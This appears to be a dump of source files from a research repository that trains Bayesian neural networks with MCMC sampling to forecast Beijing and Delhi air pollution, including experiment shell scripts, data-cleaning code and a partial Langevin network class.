"text": "#!/bin/bash\n\ncd ../\n\n# BeiJing Air Quality \n \npython3 ./train_bn_mcmc.py 53 0 1 0 SLP sigmoid data/Beijing/sets/Train_24_hour_norm.csv data/Beijing/sets/Test_24_hour_norm.csv results/Beijing_SLP_24Hr_Sigmoid/ MASE 100000\n\n##############################################################################################################\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n \npython3 ./transform_test_results.py \"./results/Beijing_SLP_24Hr_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_SLP_24Hr_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" \"data/Beijing/sets/Target_24_nzr_config.yaml\" True False False False \"TARGET_pm2.5_24_VALUE\" \"pm2.5\" \n\npython3 analyse_test_results.py \"./results/Beijing_SLP_24Hr_Sigmoid\" \"./results/Beijing_SLP_24Hr_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" 50000 \"TARGET_pm2.5_24_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.5359683632850647,
"alphanum_fraction": 0.5478261113166809,
"avg_line_length": 29.780487060546875,
"blob_id": "0e1eae072f0db9ad4a38a850fafa758770e4b71e",
"content_id": "906661e6bf9de35e956f3816f647e025854debab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1265,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 41,
"path": "/analysis/summarise_features.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\ndf = pd.read_csv('sets/Train_set_24_hour_full.csv', sep=\" \")\n\ncolnames = df.columns\n\nrecords = len(df)\n\nprint(\"\\\\begin{table}[h!]\")\nprint(\" \\\\begin{center}\")\nprint(\" \\\\caption{Feature Summary}\")\nprint(\" \\\\label{tab:table1}\")\nprint(\" \\\\begin{tabular}{l|l|r|r|r|r} \")\nprint(\" \\\\textbf{Col Name} & \\\\textbf{Type} & \\\\textbf{Missing \\%} & \\\\textbf{Min} & \\\\textbf{Mean} & \\\\textbf{Max}\\\\\\\\\")\nprint(\" \\\\hline\")\n\nfor name in colnames:\n # NEED TO ESCAPE UNDERSCORES IN LATEX\n newname = name.replace('_', '\\_')\n nacount = len(df[df[name].isna()])\n napercent = round(100*nacount/records,3)\n valtype = \"Char\"\n thetype = str(type(df.loc[1,name]))\n if thetype == \"<class 'numpy.float64'>\" :\n valtype = \"Real\"\n if thetype == \"<class 'numpy.int64'>\" :\n valtype = \"Int\"\n if (valtype != \"Char\") :\n themin = round(df[name].min(),3)\n themean = round(df[name].mean(),3)\n themax = round(df[name].max(),3)\n else:\n themin = \"-\"\n themean = \"-\"\n themax = \"-\"\n print(\" \", newname, \"&\", valtype, \"&\", napercent, \"&\", themin, \"&\", themean, \"&\", themax, \"\\\\\\\\\")\n\nprint(\" \\\\end{tabular}\")\nprint(\" \\\\end{center}\")\nprint(\"\\\\end{table}\")\n\n\n\n"
},
{
"alpha_fraction": 0.5500586032867432,
"alphanum_fraction": 0.5791324973106384,
"avg_line_length": 39.09434127807617,
"blob_id": "eccd486db6bac6ea800cbd82952bd82fd902f696",
"content_id": "c55f3b1cfe42172de7812ea08a72b3ea2000b78b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4265,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 106,
"path": "/data/Delhi/process.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport re\n\n# HELPER FUNCTION FOR INCONSISTENT DATA FORMATS \ndef clean_date(date_val): \n if re.search('\\/.*', date_val): \n month, day, year = re.split(\"\\/\", date_val) \n if len(year) == 4:\n year = year[2:]\n return day + \"-\" + month + \"-\" + year\n else: \n return date_val \n\nMISSING = object()\n# HELPER FUNCTION TO FILL IN THE MISSING DATES\ndef insert_missing_dates(df, date_field, other_col=MISSING):\n maxdate = max(df[date_field])\n mindate = min(df[date_field])\n mydates = pd.date_range(mindate, maxdate)\n if other_col == MISSING:\n temp = mydates.to_frame(index=False)\n temp.columns=[date_field]\n new_df = pd.merge(temp, df, how='left', left_on=[date_field], right_on = [date_field])\n else:\n newdf = pd.DataFrame()\n vals = df[other_col].unique()\n for i in range(len(vals)):\n for j in range(len(mydates)):\n newdf = newdf.append({other_col: vals[i], date_field: mydates[j]}, ignore_index=True)\n new_df = pd.merge(newdf, df, how='left', left_on=[date_field, other_col], right_on = [date_field, other_col])\n return new_df\n\n\n\ndf1 = pd.read_csv('cpcb_dly_aq_delhi-2011.csv')\ndf2 = pd.read_csv('cpcb_dly_aq_delhi-2012.csv')\ndf3 = pd.read_csv('cpcb_dly_aq_delhi-2013.csv')\ndf4 = pd.read_csv('cpcb_dly_aq_delhi-2014.csv')\ndf5 = pd.read_csv('cpcb_dly_aq_delhi-2015.csv')\n \n# DIFFERENT DATE FORMATS IN THE RAW DATA. NEED TO CLEAN FIRST\ndf1['Date'] = pd.to_datetime(df1['Sampling Date'], format='%d/%m/%Y')\ndf2['Date'] = pd.to_datetime(df2['Sampling Date'], format='%d/%m/%Y')\ndf3['tempdate'] = df3['Sampling Date'].apply( clean_date ) \ndf3['Date'] = pd.to_datetime(df3['tempdate'], format='%d-%m-%y')\ndf4['Date'] = pd.to_datetime(df4['Sampling Date'], format='%d-%m-%y')\ndf5['Date'] = pd.to_datetime(df5['Sampling Date'], format='%d-%m-%y')\n\n# NOW JOIN\ndfj = df1.append([df2,df3,df4,df5])\n\n# ADD INDICATOR COLUMNS FOR LOCATION\ndfj['Residential'] = np.where(dfj['Type of Location']=='Residential, Rural and other Areas',1,0)\ndfj['Industrial'] = np.where(dfj['Type of Location']=='Industrial Area',1,0)\n\n\nkeep_cols = ['Date', 'Stn Code', 'Residential', 'Industrial', 'SO2', 'NO2', 'RSPM/PM10']\ndf = dfj.loc[:,keep_cols]\n\nexpanded = insert_missing_dates(df, 'Date', other_col='Stn Code')\n\nnew_names = ['Date', 'Stn Code', 'Residential', 'Industrial', 'SO2', 'NO2', 'PM10']\nexpanded.columns = new_names\n\nexpanded.to_csv( 'delhi_pm10_stations_ALL_2011_2015.csv', header=True, index=False )\n\n\n# ##########################################################################\n# EXTRACT OUT THE INDIVIDUAL SERIES IN THE DATA AND SAVE\n\n \n# REMOVING\n#stations = df['Stn Code'].unique()\n#for stat in stations:\n# temp = expanded[ expanded['Stn Code']==stat ]\n# filename = 'delhi_pm10_station_%s_2011_2015.csv' % str(stat)\n# temp.to_csv(filename, header=True, index=False)\n\n# #############################################################################\n# BUILD ONE DATASET WITH EACH OF THE PM10 STATION READINGS AS FEATURES\n# ONLY USING A SUBSET OF STATIONS AS THE OTHERS ARE MISSING SEVERAL YEARS\n################################################################################\ngood_stations = [144, 146, 345]\nbase = pd.DataFrame()\nfor stat in good_stations:\n if len(base) == 0 :\n temp = expanded[ expanded['Stn Code']==stat ]\n temp2 = temp.loc[:,['Date','PM10', 'SO2', 'NO2']]\n col1_name = 'STN_%s_PM10' % str(stat)\n col2_name = 'STN_%s_SO2' % str(stat)\n col3_name = 'STN_%s_NO2' % str(stat)\n temp2.columns = ['Date', col1_name, 
col2_name, col3_name]\n base = temp2\n else :\n temp = expanded[ expanded['Stn Code']==stat ]\n temp2 = temp.loc[:,['Date','PM10', 'SO2', 'NO2']]\n col1_name = 'STN_%s_PM10' % str(stat)\n col2_name = 'STN_%s_SO2' % str(stat)\n col3_name = 'STN_%s_NO2' % str(stat)\n temp2.columns = ['Date', col1_name, col2_name, col3_name]\n new_df = pd.merge(base, temp2, how='left', left_on=['Date'], right_on = ['Date'])\n base = new_df \n\nfilename = 'delhi_pm10_all_stations_wide.csv'\nbase.to_csv(filename, header=True, index=False)\n\n\n\n\n \n"
},
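The `insert_missing_dates` helper above reindexes each series onto a full daily calendar via a left merge, so absent days surface as NaN rows. A compact sketch of the same idea for the single-series case, on toy data rather than the Delhi files:

```python
import pandas as pd

df = pd.DataFrame({
    "Date": pd.to_datetime(["2011-01-01", "2011-01-04"]),
    "PM10": [120.0, 98.0],
})

# Build the complete daily range, then left-merge so absent days become NaN.
full = pd.date_range(df["Date"].min(), df["Date"].max()).to_frame(index=False)
full.columns = ["Date"]
expanded = full.merge(df, how="left", on="Date")
print(expanded)  # 2011-01-02 and 2011-01-03 appear with PM10 = NaN
```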
{
"alpha_fraction": 0.7116279006004333,
"alphanum_fraction": 0.7720929980278015,
"avg_line_length": 77.09091186523438,
"blob_id": "a4d46213930773d363780dd14d54563e2604988b",
"content_id": "c830d4988057f605f22e4ad10babd2f8787be96b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 860,
"license_type": "no_license",
"max_line_length": 314,
"num_lines": 11,
"path": "/experiments/RUN_BeiJing_7day_LangevinFFNN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\npython3 ./train_bn_mcmc.py 28 10 1 0 LangevinFFNN sigmoid data/Beijing/sets/Train_168_hour_norm.csv data/Beijing/sets/Test_168_hour_norm.csv results/Beijing_7day_LvnFFNN_Sigmoid/ MASE 10000\n\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n \npython3 ./transform_test_results.py \"./results/Beijing_7day_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_7day_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" \"data/Beijing/sets/Target_168_nzr_config.yaml\" True False False False \"TARGET_pm2.5_168_VALUE\" \"pm2.5\" \n\npython3 analyse_test_results.py \"./results/Beijing_7day_LvnFFNN_Sigmoid\" \"./results/Beijing_7day_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" 5000 \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.5374601483345032,
"alphanum_fraction": 0.5619450211524963,
"avg_line_length": 39.55244827270508,
"blob_id": "3c058cc91e95fa1cbb3d568a1c2d0977d0dd7cdf",
"content_id": "52ddfeb99754ef402b7b42a76a6156a7cfce3c92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11599,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 286,
"path": "/train_bn_mcmc.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\nsys.path.append('src')\n\n#import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nimport time\nimport sys\nimport os\nimport SLP as slp\nimport FFNN as ffnn\nimport LangevinFFNN as lgvnffnn\nimport MCMC as mcmc\nimport DeepFFNN as deepffnn\n#import DeepGBFFNN as deepgbffnn\n\n#################################################################################\n# TRAIN A BAYESIAN NEURAL NETWORK \n# PARAMETERS\n# - INPUT NODES\n# - HIDDEN NODES\n# - OUTPUT NODES\n# - MAXIMUM DEPTH\n# - NETWORK ARCHITECTURE\n# - OUTPUT ACTIVATION\n# - PATH TO TRAINING DATA\n# - PATH TO TESTING DATA\n# - PATH TO RESULTS\n# - EVAL METRIC\n# - EPOCHS\n# - SEED (OPTIONAL)\n#################################################################################\ndef main():\n print(\"length: \", len(sys.argv) )\n if len(sys.argv) < 12:\n print(\"ERROR: MISSING ARGUMENTS\")\n print_usage(sys.argv)\n exit(1)\n else:\n input = int(sys.argv[1])\n hidden = int(sys.argv[2])\n output = int(sys.argv[3])\n depth = int(sys.argv[4])\n architecture = sys.argv[5]\n activation = sys.argv[6]\n train_path = sys.argv[7]\n test_path = sys.argv[8]\n results_path = sys.argv[9]\n eval_metric = sys.argv[10]\n epochs = int(sys.argv[11])\n if len(sys.argv) > 12:\n rand_seed = sys.argv[12]\n else:\n rand_seed = 0\n np.random.seed(rand_seed)\n\n train_model(input, hidden, output, depth, architecture, activation, train_path, test_path, results_path, eval_metric, epochs)\n\n#################################################################################\ndef print_usage(args):\n print(\"USAGE \")\n print(args[0], \"<INPUT NODES> <HIDDEN NODES> <OUTPUT NODES> <DEPTH> <ARCH> <ACTIVATION> <TRAIN> <TEST> <RESULTS DIR> <EVAL METRIC> <EPOCHS> (<SEED>)\")\n print(\"Valid model architectures: SLP FFNN DeepFFNN LangevinFFNN \")\n print(\"Valid output activation functions: linear sigmoid tanh relu\")\n print(\"Valid eval metrics: RMSE MAE MAPE MASE MASEb\")\n print(\"NOTE\")\n print(\"THE NUMBER OF COLUMNS IN THE TRAIN AND TEST DATA MUST BE EQUAL TO INPUT PLUS OUTPUT NODES.\")\n\n\n#################################################################################\n# CREATE RESULTS DIRECTORY IF NEEDED\n#################################################################################\ndef ensure_resultsdir(results_dir):\n print(\"testing for \", results_dir)\n directory = os.path.abspath(results_dir)\n if not os.path.exists(directory):\n print(\"Does not exist... 
creating\")\n os.makedirs(directory)\n\n\n#################################################################################\n# TRAIN THE MODELS\n#################################################################################\ndef train_model(input, hidden, output, depth, architecture, activation, train_path, test_path, results_path, eval_metric, epochs):\n ensure_resultsdir(results_path)\n rezfile = results_path + \"results.txt\"\n outres = open(rezfile, 'w')\n traindata = np.loadtxt(train_path)\n testdata = np.loadtxt(test_path)\n\n if architecture == 'DeepGBFFNN':\n neuralnet = deepgbffnn.DeepGBFFNN(input, hidden, output, depth, 0.05, activation, eval_metric)\n elif architecture == 'DeepFFNN':\n neuralnet = deepffnn.DeepFFNN(input, hidden, output, depth, activation, eval_metric)\n elif architecture == 'LangevinFFNN':\n neuralnet = lgvnffnn.LangevinFFNN(input, hidden, output, activation, eval_metric)\n elif architecture == 'SLP':\n neuralnet = slp.SLP(input, output, activation, eval_metric)\n else:\n neuralnet = ffnn.FFNN(input, hidden, output, activation, eval_metric)\n\n neuralnet.print()\n\n random.seed( time.time() )\n num_samples = epochs\n\n start_time = time.time()\n\n estimator = mcmc.MCMC(num_samples, traindata, testdata, neuralnet, results_path, eval_metric) \n estimator.print()\n [pos_w, pos_tau, eval_train, eval_test, accept_ratio, test_preds_file] = estimator.sampler()\n print(\"\\nMCMC Training Complete\")\n print(\"- Execution Time: %.2f seconds \" % (time.time() - start_time))\n\n burnin = int(0.1 * num_samples) \n use_samples = burnin\n\n burn_x = []\n burn_y = []\n\n burnfile = results_path + \"burnin.tsv\"\n outburn = open(burnfile, 'w')\n outburn.write(\"Burnin\\t\" + eval_metric + \"\\r\\n\") \n for i in range( int((num_samples-use_samples)/burnin)):\n burner = (i+1)*burnin\n endpoint = burner + use_samples\n eval_temp = np.mean(eval_test[int(burner):endpoint])\n burn_x.append(burner)\n burn_y.append( eval_temp )\n outburn.write(\"%f\\t%f\\r\\n\" % (burner, eval_temp) )\n\n outburn.close()\n\n burnin = num_samples - use_samples\n\n pos_w = pos_w[int(burnin):, ]\n \n eval_tr = np.mean(eval_train[int(burnin):])\n evaltr_std = np.std(eval_train[int(burnin):])\n eval_tst = np.mean(eval_test[int(burnin):])\n evaltest_std = np.std(eval_test[int(burnin):])\n outres.write(\"Train \" + eval_metric + \"\\t%f\\r\\n\" % eval_tr)\n outres.write(\"Train \" + eval_metric + \" Std\\t%f\\r\\n\" % evaltr_std)\n outres.write(\"Test \" + eval_metric + \"\\t%f\\r\\n\" % eval_tst)\n outres.write(\"Test \" + eval_metric + \" Std\\t%f\\r\\n\" % evaltest_std)\n outres.write(\"Accept Ratio\\t%f\\r\\n\" % accept_ratio)\n outres.close()\n\n write_weights( pos_w, results_path )\n #create_weight_boxplot( pos_w, results_path )\n\n create_test_forecast_bands(burnin, input, test_preds_file, testdata, results_path)\n\n\n#################################################################################\n# PLOT CONFIDENCE INTERVAL\n#################################################################################\ndef plot_timeseries_confidence_intervals( burnin, eval_train, eval_test, results_path ):\n\n fx_train_final = eval_train[int(burnin):, ]\n fx_test_final = eval_test[int(burnin):, ]\n\n fx_mu = fx_test_final.mean(axis=0)\n fx_high = np.percentile(fx_test_final, 95, axis=0)\n fx_low = np.percentile(fx_test_final, 5, axis=0)\n \n fx_mu_tr = fx_train_final.mean(axis=0)\n fx_high_tr = np.percentile(fx_train_final, 95, axis=0)\n fx_low_tr = np.percentile(fx_train_final, 5, axis=0)\n \n ytestdata = 
testdata[:, input]\n ytraindata = traindata[:, input]\n \n plt.plot(x_test, ytestdata, label='actual')\n plt.plot(x_test, fx_mu, label='pred. (mean)')\n plt.plot(x_test, fx_low, label='pred.(5th percen.)')\n plt.plot(x_test, fx_high, label='pred.(95th percen.)')\n plt.fill_between(x_test, fx_low, fx_high, facecolor='g', alpha=0.4)\n plt.legend(loc='upper right')\n \n plt.title(\"Plot of Test Data vs MCMC Uncertainty \")\n plt.savefig(results_path + 'mcmcrestest.png')\n plt.savefig(results_path + 'mcmcrestest.svg', format='svg', dpi=600)\n plt.clf()\n\n plt.plot(x_train, ytraindata, label='actual')\n plt.plot(x_train, fx_mu_tr, label='pred. (mean)')\n plt.plot(x_train, fx_low_tr, label='pred.(5th percen.)')\n plt.plot(x_train, fx_high_tr, label='pred.(95th percen.)')\n plt.fill_between(x_train, fx_low_tr, fx_high_tr, facecolor='g', alpha=0.4)\n plt.legend(loc='upper right')\n\n plt.title(\"Plot of Train Data vs MCMC Uncertainty \")\n plt.savefig(results_path + 'mcmcrestrain.png')\n plt.savefig(results_path + 'mcmcrestrain.svg', format='svg', dpi=600)\n plt.clf()\n\n#################################################################################\n# WRITE OUT THE WEIGHTS \n#################################################################################\ndef write_weights( pos_w, results_path ):\n np.savetxt( results_path + 'weights.csv', pos_w, delimiter=',')\n\n\n#################################################################################\n# SOME PLOTTTING FUNCTION \n#################################################################################\ndef create_weight_boxplot( pos_w, results_path ):\n mpl_fig = plt.figure()\n ax = mpl_fig.add_subplot(111)\n\n ax.boxplot(pos_w)\n ax.set_xlabel('Weights & Biases')\n ax.set_ylabel('Posterior')\n\n plt.title(\"Boxplot of Posterior W (weights and biases)\")\n plt.savefig(results_path + 'w_pos.png')\n plt.savefig(results_path + 'w_pos.svg', format='svg', dpi=600)\n plt.clf()\n\n#################################################################################\n# TURN THE TEST PREDICTIONS INTO MEAN PREDICTION AND A RANGE OF QUANTILE BANDS\n# THEN CALCULATE SUMMARY STATISTICS ABOUT THE CALIBRATION OF THE MODEL \n#################################################################################\ndef create_test_forecast_bands(burnin, input, test_preds_file, testdata, results_path):\n # OPEN THE RESULTS FILE\n rez = np.loadtxt(test_preds_file)\n # CULL THE BURNIN\n tested = rez[int(burnin):, ]\n fx_mu = tested.mean(axis=0)\n fx_99 = np.percentile(tested, 99, axis=0)\n fx_95 = np.percentile(tested, 95, axis=0)\n fx_90 = np.percentile(tested, 90, axis=0)\n fx_80 = np.percentile(tested, 80, axis=0)\n fx_20 = np.percentile(tested, 20, axis=0)\n fx_10 = np.percentile(tested, 10, axis=0)\n fx_5 = np.percentile(tested, 5, axis=0)\n fx_1 = np.percentile(tested, 1, axis=0)\n y_test = testdata[:, input]\n data = {'y':y_test, 'qrt_1':fx_1, 'qrt_5':fx_5, 'qrt_10':fx_10, 'qrt_20':fx_20, 'mu': fx_mu, \n 'qrt_80':fx_80, 'qrt_90':fx_90, 'qrt_95':fx_95, 'qrt_99':fx_99 }\n df = pd.DataFrame(data)\n df.to_csv(results_path + 'testdata_prediction_intervals.csv', index=False)\n\n df[\"in_98_window\"] = np.where( (df['y']>df['qrt_1']) & (df['y']<df['qrt_99']), 1, 0 )\n df[\"in_90_window\"] = np.where( (df['y']>df['qrt_5']) & (df['y']<df['qrt_95']), 1, 0 )\n df[\"in_80_window\"] = np.where( (df['y']>df['qrt_10']) & (df['y']<df['qrt_90']), 1, 0 )\n df[\"in_60_window\"] = np.where( (df['y']>df['qrt_20']) & (df['y']<df['qrt_80']), 1, 0 )\n df[\"window_size_98\"] = 
df['qrt_99'] - df['qrt_1']\n df[\"window_size_90\"] = df['qrt_95'] - df['qrt_5']\n df[\"window_size_80\"] = df['qrt_90'] - df['qrt_10']\n df[\"window_size_60\"] = df['qrt_80'] - df['qrt_20']\n\n df[\"base_error\"] = fx_mu - y_test\n df[\"abs_error\"] = abs(df[\"base_error\"])\n \n in_98_window = df[\"in_98_window\"].mean()\n in_90_window = df[\"in_90_window\"].mean()\n in_80_window = df[\"in_80_window\"].mean()\n in_60_window = df[\"in_60_window\"].mean()\n max_window_size_98 = df[\"window_size_98\"].max() \n mean_window_size_98 = df[\"window_size_98\"].mean() \n min_window_size_98 = df[\"window_size_98\"].min() \n\n max_window_size_90 = df[\"window_size_90\"].max() \n mean_window_size_90 = df[\"window_size_90\"].mean() \n min_window_size_90 = df[\"window_size_90\"].min() \n max_window_size_80 = df[\"window_size_80\"].max() \n mean_window_size_80 = df[\"window_size_80\"].mean() \n min_window_size_80 = df[\"window_size_80\"].min()\n \n max_window_size_60 = df[\"window_size_60\"].max() \n mean_window_size_60 = df[\"window_size_60\"].mean() \n min_window_size_60 = df[\"window_size_60\"].min() \n\n sum_data = { 'window': [98,90,80,60],\n 'calibration':[in_98_window,in_90_window,in_80_window,in_60_window],\n 'min_size':[min_window_size_98,min_window_size_90,min_window_size_80,min_window_size_60],\n 'mean_size':[mean_window_size_98,mean_window_size_90,mean_window_size_80,mean_window_size_60],\n 'max_size':[max_window_size_98,max_window_size_90,max_window_size_80,max_window_size_60] }\n sum_df = pd.DataFrame(sum_data)\n sum_df.to_csv(results_path + 'testdata_calibration.csv', index=False)\n\nif __name__ == \"__main__\": main()\n\n"
},
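`create_test_forecast_bands` above turns the matrix of post-burn-in sample predictions into percentile bands and then measures how often the true value falls inside each band. A condensed sketch of that calibration check on synthetic samples (all data here is made up for illustration):

```python
import numpy as np

rng = np.random.default_rng(1)
samples = rng.normal(loc=5.0, scale=1.0, size=(2000, 50))  # (draws, test rows)
y_test = rng.normal(loc=5.0, scale=1.0, size=50)

# 5th/95th percentiles across draws give a 90% band per test row.
lo = np.percentile(samples, 5, axis=0)
hi = np.percentile(samples, 95, axis=0)
coverage = np.mean((y_test > lo) & (y_test < hi))
print(f"90%-band empirical coverage: {coverage:.2f}")  # well-calibrated => ~0.90
```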
{
"alpha_fraction": 0.6772908568382263,
"alphanum_fraction": 0.7622842192649841,
"avg_line_length": 67.2727279663086,
"blob_id": "e652f83d6acdc376b325199eb0882498dcd2660b",
"content_id": "374b22e66226a954d3d77efbc09fe8a79871df1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 753,
"license_type": "no_license",
"max_line_length": 301,
"num_lines": 11,
"path": "/experiments/RUN_Delhi_DeepGBFFNN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n \ncd ../\n\n# Delhi Air Quality\n\npython ./train_bn_mcmc.py 20 5 1 3 DeepGBFFNN sigmoid data/Delhi/STN_144/train_normalised.csv data/Delhi/STN_144/test_normalised.csv results/Delhi_144_DeepGBFFNN_Sigmoid/ MASE 1000\n\npython ./transform_test_results.py \"./results/Delhi_144_DeepGBFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_144_DeepGBFFNN_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_144/test.csv\" \"data/Delhi/STN_144/nzr_config.yaml\" True False False False \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\npython analyse_test_results.py \"./results/Delhi_144_DeepGBFFNN_Sigmoid\" \"./results/Delhi_144_DeepGBFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_144/test.csv\" 500 \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\n\n"
},
{
"alpha_fraction": 0.456078439950943,
"alphanum_fraction": 0.4663529396057129,
"avg_line_length": 41.072608947753906,
"blob_id": "f180ba2d9409bcb59d8646429c8d62baa684e73e",
"content_id": "ba04d6ecb6c4c2967463aaf41db3843a5317cb0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12750,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 303,
"path": "/src/LangevinFFNN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\nimport time\nimport math\nfrom LangevinNeuralNetwork import LangevinNeuralNetwork\n\n#-------------------------------------------------------------------------------\n# A Langevin Bayesian Neural Network \n# \n# Contains a rnage of methods that make a neural network learner amenable to\n# learning a set of weightings using a MCMC process with Langevin dynamics.\n#-------------------------------------------------------------------------------\nclass LangevinFFNN(LangevinNeuralNetwork):\n\n def __init__(self, input, hidden, output, output_act, eval_metric):\n\n self.hidden = hidden\n self.sgd_runs = 1\n LangevinNeuralNetwork.__init__(self, input, output, output_act, eval_metric) \n\n self.w_size = self.get_weight_vector_length()\n # for Equation 9 in Ref [Chandra_ICONIP2017]\n self.sigma_diagmat = np.zeros((self.w_size, self.w_size)) \n np.fill_diagonal(self.sigma_diagmat, self.step_w)\n\n self.initialise_cache()\n\n self.W1 = np.random.randn(self.input, self.hidden) / np.sqrt(self.input)\n self.B1 = np.random.randn(1, self.hidden) / np.sqrt(self.hidden) # bias first layer\n self.W2 = np.random.randn(self.hidden, self.output) / np.sqrt(self.hidden)\n self.B2 = np.random.randn(1, self.output) / np.sqrt(self.hidden) # bias second layer\n\n self.hidout = np.zeros((1, self.hidden)) # output of first hidden layer\n self.out = np.zeros((1, self.output)) # output layer for base model\n\n self.final_out = np.zeros((1, self.output)) # Final output for the model\n\n ######################################################################\n # PRINT THE ARCHITECTURE\n ######################################################################\n def print(self):\n print(\"Bayesian Langevin FEED FORWARD Neural Network\")\n print(\"Batch Mode:\", self.use_batch)\n print(\"Learning Rate:\", self.lrate)\n print(\"Input Nodes:\", self.input)\n print(\"Hidden Nodes:\", self.hidden)\n print(\"Output Nodes:\", self.output)\n\n\n ######################################################################\n # PASS DATA X THROUGH THE NETWORK TO PRODUCE AN OUTPUT\n ######################################################################\n def forward_pass(self, X):\n z1 = X.dot(self.W1) - self.B1\n self.hidout = self.sigmoid(z1) # output of first hidden layer\n z2 = self.hidout.dot(self.W2) - self.B2\n self.out = self.sigmoid(z2)\n self.final_out = self.out\n return self.final_out\n\n ######################################################################\n # BATCH UPDATE FUNCTIONS FOR STOCHASTIC GRADIENT DESCENT\n # WE STORE THE WEIGHT AND BIAS UPDATES UNTIL THE BATCH IS FINISHED\n # THEN APPLY THEM\n ######################################################################\n def reset_batch_update(self):\n self.W2_batch_update = self.W2.copy()\n self.B2_batch_update = self.B2.copy()\n self.W1_batch_update = self.W1.copy()\n self.B1_batch_update = self.B1.copy()\n\n def apply_batch_update(self):\n self.W2 = self.W2_batch_update\n self.B2 = self.B2_batch_update\n self.W1 = self.W1_batch_update\n self.B1 = self.B1_batch_update\n\n ########################################################################################\n # RUN THE ERROR BACK THROUGH THE NETWORK TO CALCULATE THE CHANGES TO\n # ALL PARAMETERS.\n # NOTE - THIS IS CALLED AFTER THE forward_pass\n # - YOU NEED TO CALL reset_batch_update() BEFORE STARTING THE BATCH\n # - YOU NEED TO CALL apply_batch_update() AFTER ALL DATA POINTS IN THE BATCH \n 
########################################################################################\n def backward_pass_batch(self, Input, desired):\n out_delta = (desired - self.final_out) * (self.final_out * (1 - self.final_out))\n hid_delta = out_delta.dot(self.W2.T) * (self.hidout * (1 - self.hidout))\n\n for x in range(0, self.hidden):\n for y in range(0, self.output):\n self.W2_batch_update[x, y] += self.lrate * out_delta[y] * self.hidout[x]\n for y in range(0, self.output):\n self.B2_batch_update[y] += -1 * self.lrate * out_delta[y]\n\n for x in range(0, self.input):\n for y in range(0, self.hidden):\n self.W1_batch_update[x, y] += self.lrate * hid_delta[y] * Input[x]\n for y in range(0, self.hidden):\n self.B1_batch_update[y] += -1 * self.lrate * hid_delta[y]\n\n ########################################################################################\n # RUN THE ERROR BACK THROUGH THE NETWORK TO CALCULATE THE CHANGES TO ALL PARAMETERS.\n ########################################################################################\n def backward_pass(self, Input, desired):\n out_delta = (desired - self.final_out) * (self.final_out * (1 - self.final_out))\n hid_delta = out_delta.dot(self.W2.T) * (self.hidout * (1 - self.hidout))\n\n for x in range(0, self.hidden):\n for y in range(0, self.output):\n self.W2[x, y] += self.lrate * out_delta[y] * self.hidout[x]\n for y in range(0, self.output):\n self.B2[y] += -1 * self.lrate * out_delta[y]\n\n for x in range(0, self.input):\n for y in range(0, self.hidden):\n self.W1[x, y] += self.lrate * hid_delta[y] * Input[x]\n for y in range(0, self.hidden):\n self.B1[y] += -1 * self.lrate * hid_delta[y]\n\n\n\n ######################################################################\n # RETURN AN UPDATED WEIGHT VECTOR USING GRADIENT DESCENT\n # BackPropagation with SGD\n ######################################################################\n def langevin_gradient_update(self, data, w): \n if self.use_batch:\n return self.calculate_gradient_using_batch(data, w)\n else :\n return self.calculate_gradient_sgd(data, w)\n\n ######################################################################\n # BackPropagation with batch update\n ######################################################################\n def calculate_gradient_using_batch(self, data, w):\n self.decode(w) # method to decode w into W1, W2, B1, B2.\n size = data.shape[0]\n self.reset_batch_update()\n \n Input = np.zeros((1, self.input)) \n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n \n for i in range(0, self.sgd_runs):\n for j in range(0, size):\n pat = j \n Input = data[pat, 0:self.input]\n Desired = data[pat, self.input:]\n self.forward_pass(Input)\n self.backward_pass_batch(Input, Desired)\n self.apply_batch_update()\n w_updated = self.encode()\n\n return w_updated\n\n\n\n ######################################################################\n # BackPropagation 